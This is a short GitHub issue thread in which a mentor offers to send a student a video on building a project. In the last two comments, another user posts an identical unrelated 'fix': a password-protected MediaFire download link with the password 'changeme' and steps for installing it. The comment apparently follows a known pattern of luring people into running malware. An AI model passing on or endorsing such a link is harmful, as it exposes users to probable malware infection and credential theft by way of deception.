### ISSUE TITLE
build project

### ISSUE THREAD

**Issue by OpenCodeChicago** [AndrewThompson999/Chicago_Slicce_House#1]
Hi Andy, you were missed last session, where I showed how to build a project on GitHub, I'll provide you short video of how to achieve it, or you can join on our Discord server, and where I'll show it as well.

**Comment by AndrewThompson999** [comment]
Hi, oh, thank you! Yes, please provide an video if it's possible. Thank you!

**Comment by OpenCodeChicago** [comment]
Ok, I'll will do it on this upcoming week.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
